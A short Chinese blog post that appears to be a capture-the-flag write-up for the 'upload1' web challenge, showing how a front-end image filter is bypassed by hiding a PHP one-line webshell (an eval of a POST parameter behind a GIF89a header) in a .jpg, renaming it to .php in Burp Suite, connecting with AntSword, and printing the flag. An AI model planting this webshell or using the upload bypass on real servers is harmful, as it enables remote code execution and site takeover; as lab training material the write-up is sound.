攻防世界-web进阶-upload1

进去之后让上传东西,想上传一个一句话木马,发现只让上传图片格式的,并有前端过滤

那我们把一句话写到一个文本文件里,再把后缀名改为jpg

GIF89a
<script language="php">eval($_POST['shell']);</script> 

  

上传,bp拦截包,改包,将后缀名由jpg改为php,上传成功后会返回一个路径,

 

 

蚁剑连接

 

 

连接成功

flag出

 

 cyberpeace{bb154f23ac9e14abb2da5e22a7c7936d}

posted @ 2020-10-24 16:38  夜布多  阅读(120)  评论(0编辑  收藏  举报